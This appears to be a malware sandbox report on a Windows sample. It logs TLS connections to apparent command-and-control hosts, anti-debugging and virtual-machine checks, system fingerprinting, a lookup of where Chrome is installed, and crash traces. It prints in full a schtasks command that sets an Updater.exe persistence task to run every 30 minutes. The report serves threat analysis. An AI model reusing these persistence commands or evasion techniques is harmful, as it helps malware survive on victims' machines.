TLSv1 192.168.56.103:49217 154.92.15.189:443	C=US, O=Let's Encrypt, CN=R3	CN=i.alie3ksgaa.com	e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.103:49222 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49228 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49229 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49230 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49231 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49232 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49233 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49234 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49236 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49237 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49242 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49245 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49246 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49244 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49239 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49241 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49247 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49248 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49253 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49238 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49251 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49255 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49257 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49262 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49243 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49552 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49642 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49648 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49323 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49340 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49645 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49650 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49263 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49470 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49647 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49653 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49639 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49655 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49661 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49646 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49644 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49663 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49649 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49652 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49651 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49656 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49659 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49657 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49660 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49662 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49667 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49668 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49674 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49676 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49684 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49681 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49691 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49673 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49692 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49671 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49677 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49669 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49675 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49670 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49678 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49672 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49685 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49679 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49683 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49686 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49688 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49680 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49689 94.177.48.37:443	C=US, O=Let's Encrypt, CN=R3	CN=fleefight.it	91:68:1d:27:8a:cf:73:d8:08:f0:ef:b4:c6:fe:7b:6c:17:be:10:d7
TLSv1 192.168.56.103:49687 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49690 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49693 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49694 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49695 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49696 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49697 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49225 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49250 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49261 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49641 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49643 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49654 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49658 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49664 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49666 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49682 154.92.15.189:443	None	None	None
TLSv1 192.168.56.103:49698 154.92.15.189:443	None	None	None

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 23, 2024, 7:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 23, 2024, 7:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 23, 2024, 7:55 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:55 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:55 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:55 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:56 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:56 a.m.			0	0
IsDebuggerPresent Jan. 23, 2024, 7:56 a.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 23, 2024, 7:55 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 HR" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:55 a.m.	buffer: SUCCESS: The scheduled task "MPGPH131 LG" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:55 a.m.	buffer: SUCCESS: The scheduled task "explorhe.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: chcp console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: C:\Users\test22\AppData\Roaming\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F console_handle: 0x00000007	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW Jan. 23, 2024, 7:56 a.m.	buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 23, 2024, 7:55 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

One or more processes crashed (50 out of 88 events)

Time & API	Arguments	Status
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931576 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931604 registers.edx: 2 registers.ebx: 15807292 registers.esi: 5 registers.ecx: 15807292	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931576 registers.edi: 3931576 registers.eax: 0 registers.ebp: 3931604 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931784	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931576 registers.edi: 3931576 registers.eax: 0 registers.ebp: 3931604 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931784	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931576 registers.edi: 3931576 registers.eax: 0 registers.ebp: 3931604 registers.edx: 0 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931784	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931576 registers.edi: 3931576 registers.eax: 0 registers.ebp: 3931604 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931784	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x299202 @ 0x1669202 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931576 registers.edi: 3931576 registers.eax: 0 registers.ebp: 3931604 registers.edx: 2 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931784	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 17924096 registers.esi: 22118400 registers.ecx: 22118400	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294ce4 @ 0x1664ce4 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294dc0 @ 0x1664dc0 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 17924096 registers.esi: 22118400 registers.ecx: 1269045167	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294e92 @ 0x1664e92 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 17924096 registers.esi: 22118400 registers.ecx: 3931556	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294e92 @ 0x1664e92 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294e92 @ 0x1664e92 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 17924096 registers.esi: 22118400 registers.ecx: 2969966937	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x294f8c @ 0x1664f8c face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 23453836 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 17924096 registers.esi: 22118400 registers.ecx: 133792577	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe1d9 exception.instruction: div eax exception.module: face.exe exception.exception_code: 0xc0000094 exception.offset: 2089433 exception.address: 0x15ce1d9 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 0 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864367 registers.esi: 0 registers.ecx: 3931564	1
__exception__ Jan. 23, 2024, 7:55 a.m.	stacktrace: face+0x295022 @ 0x1665022 face+0x294107 @ 0x1664107 face+0x2218dc @ 0x15f18dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: face+0x1fe204 exception.instruction: ud2 exception.module: face.exe exception.exception_code: 0xc000001d exception.offset: 2089476 exception.address: 0x15ce204 registers.esp: 3931528 registers.edi: 3931528 registers.eax: 0 registers.ebp: 3931556 registers.edx: 2 registers.ebx: 22864410 registers.esi: 0 registers.ecx: 3931564	1
